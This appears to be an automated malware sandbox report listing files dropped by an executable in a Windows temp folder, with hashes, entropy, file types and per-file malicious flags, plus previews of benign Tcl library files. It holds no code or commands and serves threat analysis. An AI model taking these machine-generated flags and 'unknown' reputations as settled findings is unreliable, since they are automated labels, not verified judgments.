                                                                                                                                                                                                                                                    SHA-512:2E1EBCBE595C5A1FE09F5933D4BA190081EF343EA313725BB0F8FCBF98079A091AB8C0465EF437B310A1753FFC2D48D9D70EC80D773E7919A6485EF730E93EA1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):59904
                                                                                                                                                                                                                                                    Entropy (8bit):6.049630833293433
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:kXS5hxqhOz9XNpOb/AXVuips6Pm550971BVO5nkcwo5ArrwlyQ6mrCHrO1MquTSU:kC/IMZHO0lu+s60VwvrrDmrCrO1HuTR
                                                                                                                                                                                                                                                    MD5:D4E7C1546CF3131B7D84B39F8DA9E321
                                                                                                                                                                                                                                                    SHA1:6B096858723C76848B85D63B4DA334299BECED5B
                                                                                                                                                                                                                                                    SHA-256:C4243BA85C2D130B4DEC972CD291916E973D9D60FAC5CEEA63A01837ECC481C2
                                                                                                                                                                                                                                                    SHA-512:4383E2BC34B078819777DA73F1BD4A88B367132E653A7226ED73F43E4387ED32E8C2BCAFD8679EF5E415F0B63422DB05165A9E794F055AA8024FE3E7CABC66B9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):59904
                                                                                                                                                                                                                                                    Entropy (8bit):6.048382351359956
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:Q2q4fSp3W9sHSIeXNKIv3dJcZqXIq9BVO5nOC6u58rrYlyQRvVFtTiO1lqNkdZ:9TqpwsH1eTJWZv6FrrsNFtmO1oNk
                                                                                                                                                                                                                                                    MD5:371226B8346F29011137C7AA9E93F2F6
                                                                                                                                                                                                                                                    SHA1:485DE5A0CA0564C12EACC38D1B39F5EF5670A2E2
                                                                                                                                                                                                                                                    SHA-256:5B08FE55E4BBF2FBFD405E2477E023137CFCEB4D115650A5668269C03300A8F8
                                                                                                                                                                                                                                                    SHA-512:119A5E16E3A3F2FF0B5ACB6B5D5777997102A3CAE00D48C0F8921DF5818F5FBDA036974E23C6F77A6B9380C6A1065372E70F8D4E665DFD37E5F90EB27DB7420C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:RAR archive data, v5
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):31122494
                                                                                                                                                                                                                                                    Entropy (8bit):7.999993988958585
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:786432:TR6qYuhnA26NTYvfZiUX6YPkbHB7CQQsGsiamfBHiI:fYuhnL6l6fZYYPuHUsiauL
                                                                                                                                                                                                                                                    MD5:AFB81FCDFD24C61AB96D41260B4E8B25
                                                                                                                                                                                                                                                    SHA1:F35F56E6D929D9EDEA303E230EA5DF65FFBCDD76
                                                                                                                                                                                                                                                    SHA-256:312A2175614EE8C7149CB90E97F3DD724F48D2F35ABBD7CEDB5FF3228F180F8C
                                                                                                                                                                                                                                                    SHA-512:D5807D9B41114BBD3E0A5DC267CE95FD66ABB591577B6B761C69539E858933902646703B4D5C727B5AB07788C16A2BD3C208709202109568D20942EFF073D31B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):598064
                                                                                                                                                                                                                                                    Entropy (8bit):6.504706526380269
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:LiGn9go3BzQAq/ems1ku07m+ePwrwo+9Ct6:LiGn9go2Aq/bsUvKno+9CY
                                                                                                                                                                                                                                                    MD5:A7742C996FFDA7754142730220432485
                                                                                                                                                                                                                                                    SHA1:3401BECB24617F98C18B9176D12220F4D7C945C9
                                                                                                                                                                                                                                                    SHA-256:C915CDD250FF25970BA041A5DADFC93E8AE9629C6415B88A92718F1EAE9E9666
                                                                                                                                                                                                                                                    SHA-512:461935115A59ACCE074A686F3DEADBBF02A92844A57F55E20A532C77AA788B116A930A2F6100758ABD9BB3919AD15C18D498DCEAEE341CBCDDB98BB3922C7FAA
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:RAR archive data, v5
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4280238
                                                                                                                                                                                                                                                    Entropy (8bit):7.999956411806543
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:98304:wdUomal6LwHL3RF/j0JdmUPeuN/Jy3i00PUhUASll:GEaMsDRF/gJcU//r00PFASll
                                                                                                                                                                                                                                                    MD5:40862E5AA291E198DBEACACC25F903BA
                                                                                                                                                                                                                                                    SHA1:3D7C4E5D51782A7BC8EBEC4A9EB43BC9940CD87E
                                                                                                                                                                                                                                                    SHA-256:F4067E3831245E5489A328CA568E8C40DFA066D3BDA4DCB08DD684A1070A703C
                                                                                                                                                                                                                                                    SHA-512:A5E15FD5814DA8A3E6566DC5DDC57A4929B4A848F82BD517681E7833C5D3B49C6D894CEC3467DAD085FF582B989A988A6153B761C8FD2A71C21D44AECB603C03
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:RAR archive data, v5
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5463566
                                                                                                                                                                                                                                                    Entropy (8bit):7.9999672374912025
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:98304:tDYXUdsKFJiviwRhoet7DqVRn4BQS6Nvp9NnW0BErIJVh+BGk0kTXUd96XOBdFG:IUy+0bcet7ev6QxNvpq0ErIPh+BGk0k5
                                                                                                                                                                                                                                                    MD5:D9D57E793D57FA58426AF55167CAEE05
                                                                                                                                                                                                                                                    SHA1:6DFB65AC0FBD2B7FD936F301A0131838CC684460
                                                                                                                                                                                                                                                    SHA-256:45C089F60704B3FE1AD7557180EDCA357013F4FDC4806A31CE51CF5E173ADE32
                                                                                                                                                                                                                                                    SHA-512:2D10FBA389B86EA27216C16F7F84CCE0B9389368AEC8F279602D260CAEDA5A877435D16EAFC4386B0F8CBA6583F80FD0358F5251234F65E9215015DB3F68F401
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):225280
                                                                                                                                                                                                                                                    Entropy (8bit):6.036101465527911
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:Yk3eocziNzMLSMOYscmnWCAXm00LRk86Goao1IJU87/amFYw8fF01OyA9LX:v6OMqcEJAXb0LRn6fa3/amiX2Oy0
                                                                                                                                                                                                                                                    MD5:7200DCA324F3D1ECD11B2B1250B2D6C7
                                                                                                                                                                                                                                                    SHA1:DF3219CFBC6F6EE6EF025B320563A195BE46D803
                                                                                                                                                                                                                                                    SHA-256:636E12FEA8C47EA528DBA48827AC51A2E98B2EF0864854C9375B8170555C0A6E
                                                                                                                                                                                                                                                    SHA-512:DAC1154FC4E55F9E78C39FCD9FA28B1ABE36D67D9C71660BD58990A1F3864ACEAD7D1C7F55E390F3875B20685B447C3C494B3634F0DC4C7EF3B1E7A17115EB4B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):569680
                                                                                                                                                                                                                                                    Entropy (8bit):6.52221622647759
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):653136
                                                                                                                                                                                                                                                    Entropy (8bit):6.883567262143348
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2650112
                                                                                                                                                                                                                                                    Entropy (8bit):6.72219915141047
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):397824
                                                                                                                                                                                                                                                    Entropy (8bit):6.64988291161832
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):110592
                                                                                                                                                                                                                                                    Entropy (8bit):6.586001156322738
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10240
                                                                                                                                                                                                                                                    Entropy (8bit):5.843142645527012
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):900608
                                                                                                                                                                                                                                                    Entropy (8bit):6.737800356736791
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):20613
                                                                                                                                                                                                                                                    Entropy (8bit):4.703115172401551
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:XpJ4cB1RJtA61Z/kpP9leP9R5Hx396caBXhTEFHIW2ezBIdNnH:P4cB1RJtA61Z8pP/ePv396c+6HIW2ezU
                                                                                                                                                                                                                                                    MD5:A987B2DB697B0EFA13E0B88149C98C40
                                                                                                                                                                                                                                                    SHA1:9AD827E72FE82F46D350BE7368661740EFEBA50E
                                                                                                                                                                                                                                                    SHA-256:F33B4E6CA8AC8A86ACE39AD57628D7588EF04EC3D8D86C700F54CCBA77B242FC
                                                                                                                                                                                                                                                    SHA-512:7AC09C64CC909F12DDCD44E3EE4177F98DF8F4843FAAA6DF7667A4A290EB56122110292F080536E71CE5DF963EFD0CCC9614D0AF902306F843B2C56543882574
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# auto.tcl --.#.# utility procs formerly in init.tcl dealing with auto execution.# of commands and can be auto loaded themselves..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994-1998 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# auto_reset --.#.# Destroy all cached information for auto-loading and auto-execution,.# so that the information gets recomputed the next time it's needed..# Also delete any commands that are listed in the auto-load index..#.# Arguments:.# None...proc auto_reset {} {. global auto_execs auto_index auto_path. if {[array exists auto_index]} {..foreach cmdName [array names auto_index] {.. set fqcn [namespace which $cmdName].. if {$fqcn eq ""} {continue}.. rename $fqcn {}..}. }. unset -nocomplain auto_execs auto_index ::tcl::auto_oldpath. if {[catch {llength $auto_path}]} {..set auto_p
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):130093
                                                                                                                                                                                                                                                    Entropy (8bit):4.999718814637411
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:BklVEuKDDeTrVG9DAui+ur0keli1IsQVesTImhrodLzpJnlUEMwlUsozHBSOyQai:LDDeTrVKAui+ur0keli1RaesTImhrMLW
                                                                                                                                                                                                                                                    MD5:E7F4C5738A96282BD15DAEE004510B91
                                                                                                                                                                                                                                                    SHA1:A68857DF1823BEBEE83B62740E9AD668DAC69043
                                                                                                                                                                                                                                                    SHA-256:71966A6CECD4D718B8B6286573BF50539C1D4BFFAD26A1126D056A5DA48A66E4
                                                                                                                                                                                                                                                    SHA-512:41EF9624077EF5DA0ED403DABE2A647586DAAD557B4FF8A5163EBE36E2E2C7C71EFFDE23F51AD98923327160030A3786B1662D3ABBF170679F4B52FC69D4BF50
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:#----------------------------------------------------------------------.#.# clock.tcl --.#.#.This file implements the portions of the [clock] ensemble that.#.are coded in Tcl. Refer to the users' manual to see the description.#.of the [clock] command and its subcommands..#.#.#----------------------------------------------------------------------.#.# Copyright (c) 2004,2005,2006,2007 by Kevin B. Kenny.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#.#----------------------------------------------------------------------..# We must have message catalogs that support the root locale, and.# we need access to the Registry on Windows systems...uplevel \#0 {. package require msgcat 1.4. if { $::tcl_platform(platform) eq {windows} } {..if { [catch { package require registry 1.1 }] } {.. namespace eval ::tcl::clock [list variable NoRegistry {}]..}. }.}..# Put the library directory into the namespace
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1090
                                                                                                                                                                                                                                                    Entropy (8bit):2.009389929214244
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:5TUvEESVrVJ/eyN9j233V2NdWTeVCT0VbsV7EV7sYnVAMmVZyg851VqxsGkl/:5TUmJvRju3ShVbsZiAMiZyb7PF
                                                                                                                                                                                                                                                    MD5:68D69C53B4A9F0AABD60646CA7E06DAE
                                                                                                                                                                                                                                                    SHA1:DD83333DC1C838BEB9102F063971CCC20CC4FD80
                                                                                                                                                                                                                                                    SHA-256:294C97175FD0894093B866E73548AE660AEED0C3CC1E73867EB66E52D34C0DD2
                                                                                                                                                                                                                                                    SHA-512:48960E838D30401173EA0DF8597BB5D9BC3A09ED2CFFCB774BA50CB0B2ACCF47AAD3BA2782B3D4A92BEF572CBD98A3F4109FC4344DB82EB207BFDE4F61094D72
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: ascii, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):92873
                                                                                                                                                                                                                                                    Entropy (8bit):3.255311357682213
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:3kkmY4kD7HGJxYXIdjQWTGzvKHBDViIM1sbh+dJE+FKw0sXlWVvDg21jj9:cGfKqIQCGzv8D7ksb2Ur79jj9
                                                                                                                                                                                                                                                    MD5:9E67816F304FA1A8E20D2270B3A53364
                                                                                                                                                                                                                                                    SHA1:9E35EBF3D5380E34B92FE2744124F9324B901DD3
                                                                                                                                                                                                                                                    SHA-256:465AE2D4880B8006B1476CD60FACF676875438244C1D93A7DBE4CDE1035E745F
                                                                                                                                                                                                                                                    SHA-512:EE529DA3511EB8D73465EB585561D54833C46B8C31062299B46F5B9EE7EB5BE473E630AA264F45B2806FC1B480C8ED39A173FF1756CB6401B363568E951F0637
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: big5, multi-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.286986942547087
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CqTUmJvRju3ShVbsZiAMiZyb7Ptuja5z8twsDO4yT2H:JgmOEVIwAMiw/Ptuja5z8RDtyT2H
                                                                                                                                                                                                                                                    MD5:79ACD9BD261A252D93C9D8DDC42B8DF6
                                                                                                                                                                                                                                                    SHA1:FA2271030DB9005D71FAAD60B44767955D5432DD
                                                                                                                                                                                                                                                    SHA-256:1B42DF7E7D6B0FEB17CB0BC8D97E6CE6899492306DD880C48A39D1A2F0279004
                                                                                                                                                                                                                                                    SHA-512:607F21A84AE569B19DF42463A56712D232CA192E1827E53F3ACB46D373EF4165A38FFBF116E28D4EAAEF49B08F6162C7A1C517CCE2DFACA71DA07193FEFFFF06
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp1250, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.20AC0081201A0083201E2026202020210088203001602039015A0164017D0179.009020182019201C201D202220132014009821220161203A015B0165017E017A.00A002C702D8014100A4010400A600A700A800A9015E00AB00AC00AD00AE017B.00B000B102DB014200B400B500B600B700B80105015F00BB013D02DD013E017C.015400C100C2010200C40139010600C7010C00C9011800CB011A00CD00CE010E.01100143014700D300D4015000D600D70158016E00DA017000DC00DD016200DF.015500E100E2010300E4013A010700E7010D00E
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.288070862623515
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CTTUmJvRju3ShVbsZiAMiZyb7P4DRrwFsC/+H+SAJlM9aHe3cmx:wgmOEVIwAMiw/PStwFz/T5+smx
                                                                                                                                                                                                                                                    MD5:55FB20FB09C610DB38C22CF8ADD4F7B8
                                                                                                                                                                                                                                                    SHA1:604396D81FD2D90F5734FE6C3F283F8F19AABB64
                                                                                                                                                                                                                                                    SHA-256:2D1BED2422E131A140087FAF1B12B8A46F7DE3B6413BAE8BC395C06F0D70B9B0
                                                                                                                                                                                                                                                    SHA-512:07C6640BB40407C384BCF646CC436229AEC77C6398D57659B739DC4E180C81A1524F55A5A8F7B3F671A53320052AD888736383486CC01DFC317029079B17172E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp1251, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.2209074629945476
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:C4TUmJvRju3ShVbsZiAMiZyb7PMmVurcNvPNNAkbnMH+tjg:rgmOEVIwAMiw/PMhrUok7zE
                                                                                                                                                                                                                                                    MD5:5900F51FD8B5FF75E65594EB7DD50533
                                                                                                                                                                                                                                                    SHA1:2E21300E0BC8A847D0423671B08D3C65761EE172
                                                                                                                                                                                                                                                    SHA-256:14DF3AE30E81E7620BE6BBB7A9E42083AF1AE04D94CF1203565F8A3C0542ACE0
                                                                                                                                                                                                                                                    SHA-512:EA0455FF4CD5C0D4AFB5E79B671565C2AEDE2857D534E1371F0C10C299C74CB4AD113D56025F58B8AE9E88E2862F0864A4836FED236F5730360B2223FDE479DC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Encoding file: cp1252, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.3530146237761445
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CRTUmJvRju3ShVbsZiAMiZyb7PMuW24OrKUQQSqJWeIDmq:CgmOEVIwAMiw/PMuW2nKJQSqJWeI1
                                                                                                                                                                                                                                                    MD5:2E5F553D214B534EBA29A9FCEEC36F76
                                                                                                                                                                                                                                                    SHA1:8FF9A526A545D293829A679A2ECDD33AA6F9A90E
                                                                                                                                                                                                                                                    SHA-256:2174D94E1C1D5AD93717B9E8C20569ED95A8AF51B2D3AB2BCE99F1A887049C0E
                                                                                                                                                                                                                                                    SHA-512:44AB13C0D322171D5EE62946086058CF54963F91EC3F899F3A10D051F9828AC66D7E9F8055026E938DDD1B97A30D5D450B89D72F9113DEE2DBBB62DDBBBE456C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
Preview:# Encoding file: cp1253, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.2357714075228494
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CWTUmJvRju3ShVbsZiAMiZyb7PMSrcmvPNNAkKMH+tZL/M:lgmOEVIwAMiw/PMSrrokKzR0
                                                                                                                                                                                                                                                    MD5:35AD7A8FC0B80353D1C471F6792D3FD8
                                                                                                                                                                                                                                                    SHA1:484705A69596C9D813EA361625C3A45C6BB31228
                                                                                                                                                                                                                                                    SHA-256:BC4CBE4C99FD65ABEA45FBDAF28CC1D5C42119280125FBBD5C2C11892AE460B2
                                                                                                                                                                                                                                                    SHA-512:CCA3C6A4B826E0D86AC10E45FFC6E5001942AA1CF45B9E0229D56E06F2600DDA0139764F1222C56CF7A9C14E6E6C387F9AB265CB9B936E803FECD8285871C70F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
Preview:# Encoding file: cp1254, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.267336792625871
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CfTUmJvRju3ShVbsZiAMiZyb7PMI22iEePlNQhv6l50b:MgmOEVIwAMiw/PMI27EsQhvgg
                                                                                                                                                                                                                                                    MD5:0419DBEE405723E7A128A009DA06460D
                                                                                                                                                                                                                                                    SHA1:660DBE4583923CBDFFF6261B1FADF4349658579C
                                                                                                                                                                                                                                                    SHA-256:F8BD79AE5A90E5390D77DC31CB3065B0F93CB8813C9E67ACCEC72E2DB2027A08
                                                                                                                                                                                                                                                    SHA-512:FDD9F23A1B5ABBF973BEE28642A7F28F767557FE842AF0B30B1CF97CD258892F82E547392390A51900DC7FF5D56433549A5CB463779FC131E885B00568F86A32
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
Preview:# Encoding file: cp1255, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.3332869352420795
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:C0TUmJvRju3ShVbsZiAMiZyb7Ps0pPESLym/cwPm+ZMZjyco/fQIG/h:XgmOEVIwAMiw/Ps0FPLym/AsBfg/h
                                                                                                                                                                                                                                                    MD5:0FFA293AA50AD2795EAB7A063C4CCAE5
                                                                                                                                                                                                                                                    SHA1:38FEE39F44E14C3A219978F8B6E4DA548152CFD6
                                                                                                                                                                                                                                                    SHA-256:BBACEA81D4F7A3A7F3C036273A4534D31DBF8B6B5CCA2BCC4C00CB1593CF03D8
                                                                                                                                                                                                                                                    SHA-512:AB4A6176C8C477463A6CABD603528CEB98EF4A7FB9AA6A8659E1AA6FE3F88529DB9635D41649FBAD779AEB4413F9D8581E6CA078393A3042B468E8CAE0FA0780
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
Preview:# Encoding file: cp1256, single-byte
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1091
                                                                                                                                                                                                                                                    Entropy (8bit):3.2734430397929604
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:CNTUmJvRju3ShVbsZiAMiZyb7PtuWTfN641PaxUVG4da:ugmOEVIwAMiw/PtuWkgVfa
                                                                                                                                                                                                                                                    MD5:A1CCD70248FEA44C0EBB51FB71D45F92
                                                                                                                                                                                                                                                    SHA1:CC103C53B3BA1764714587EAEBD92CD1BC75194D
                                                                                                                                                                                                                                                    SHA-256:4151434A714FC82228677C39B07908C4E19952FC058E26E7C3EBAB7724CE0C77
